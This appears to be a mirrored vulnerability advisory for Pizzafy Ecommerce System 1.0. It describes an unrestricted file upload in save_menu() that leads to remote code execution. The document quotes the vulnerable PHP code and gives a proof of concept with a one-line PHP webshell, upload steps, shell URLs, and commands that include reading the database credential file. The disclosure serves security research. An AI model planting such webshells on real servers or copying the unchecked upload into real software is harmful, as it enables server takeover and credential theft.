Share
## https://sploitus.com/exploit?id=PACKETSTORM:220075
# Pizzafy Ecommerce System 1.0 โ€“ Unrestricted File Upload in save_menu() Leads to Remote Code Execution
    
    ## Details
    
    | Field | Value |
    |---|---|
    | **Vendor** | SourceCodester |
    | **Vendor URL** | https://www.sourcecodester.com |
    | **Product** | Pizzafy Ecommerce System using PHP and MySQL |
    | **Product URL** | https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |
    | **Version** | 1.0 |
    | **Vulnerability** | Unrestricted File Upload โ†’ Remote Code Execution |
    | **CWE** | CWE-434 |
    | **CVSSv3 Score** | 7.8 (High) |
    | **Attack Vector** | Network |
    | **Auth Required** | Yes (Administrator) |
    | **User Interaction** | None |
    | **Researcher** | Imad Alvi |
    | **Date** | 2026-04-12 |
    
    ---
    
    ## Affected Component
    
    **File:** `Pizzafy/admin/admin_class_novo.php` โ†’ `save_menu()` function  
    **Parameter:** `img` (FILE)  
    **Upload path:** `Pizzafy/assets/img/`
    
    ---
    
    ## Description
    
    The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never actually checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets/img/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.
    
    **Vulnerable code in `admin_class_novo.php`:**
    
    ```php
    function save_menu(){
        extract($_POST);
        // ...
        if($_FILES['img']['tmp_name'] != ''){
            $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
            $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
            $data .= ", img_path = '$fname' ";
        }
        // No extension check, no MIME type check
    }
    ```
    
    ---
    
    ## Proof of Concept
    
    ### Step 1 โ€” Create PHP Webshell
    
    Create a file named `shell_web2.php` with the following content:
    
    ```php
    <?php echo shell_exec($_GET['cmd']); ?>
    ```
    
    ### Step 2 โ€” Upload Webshell via Menu Management
    
    Login as administrator and navigate to:
    
    ```
    http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu
    ```
    
    Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.
    
    <img width="1920" height="1080" alt="Screenshot 2026-04-12 171202" src="https://github.com/user-attachments/assets/092e31ba-d034-4711-9eac-0d409fc02ead" />
    
    
    The shell is now listed as a menu item on the customer-facing page.
    
    <img width="1920" height="1080" alt="Screenshot 2026-04-12 171236" src="https://github.com/user-attachments/assets/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731" />
    
    ### Step 3 โ€” Locate Uploaded Shell
    
    Navigate to the assets directory โ€” directory listing is enabled (CWE-548):
    
    ```
    http://192.168.0.9/pizzafy/Pizzafy/assets/img/
    ```
    
    The uploaded PHP shell is visible in the directory listing.
    
    
    <img width="1920" height="1080" alt="Screenshot 2026-04-12 171300" src="https://github.com/user-attachments/assets/b51aac51-6baf-41df-8b8f-53f9370864c8" />
    
    
    ### Step 4 โ€” Execute Remote Commands
    
    Access the uploaded shell directly and pass system commands via the `cmd` parameter:
    
    ```
    http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami
    ```
    
    **Response โ€” OS command executed on the server:**
    
    ```
    desktop-g1i9np3\dell
    ```
    
    <img width="1920" height="1080" alt="Screenshot 2026-04-12 171313" src="https://github.com/user-attachments/assets/403e069d-2d07-4a5d-8e68-0b95902c148e" />
    
    
    ---
    
    ## Additional Commands
    
    ```
    ?cmd=whoami
    ?cmd=ipconfig
    ?cmd=dir C:\xampp\htdocs\pizzafy
    ?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php
    ```
    
    ---
    
    ## Impact
    
    An authenticated administrator can:
    - Upload arbitrary PHP files to the web server
    - Execute any OS-level command on the server
    - Read sensitive files including database credentials
    - Establish a reverse shell for full persistent access
    - Completely compromise the underlying server
    
    ---
    
    ## Note on Directory Listing (CWE-548)
    
    The `assets/img/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files including the webshell. This compounds the severity of the file upload vulnerability.
    
    ---
    
    ## References
    
    - [SourceCodester โ€” Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
    - CWE-434: Unrestricted Upload of File with Dangerous Type
    - CWE-548: Exposure of Information Through Directory Listing.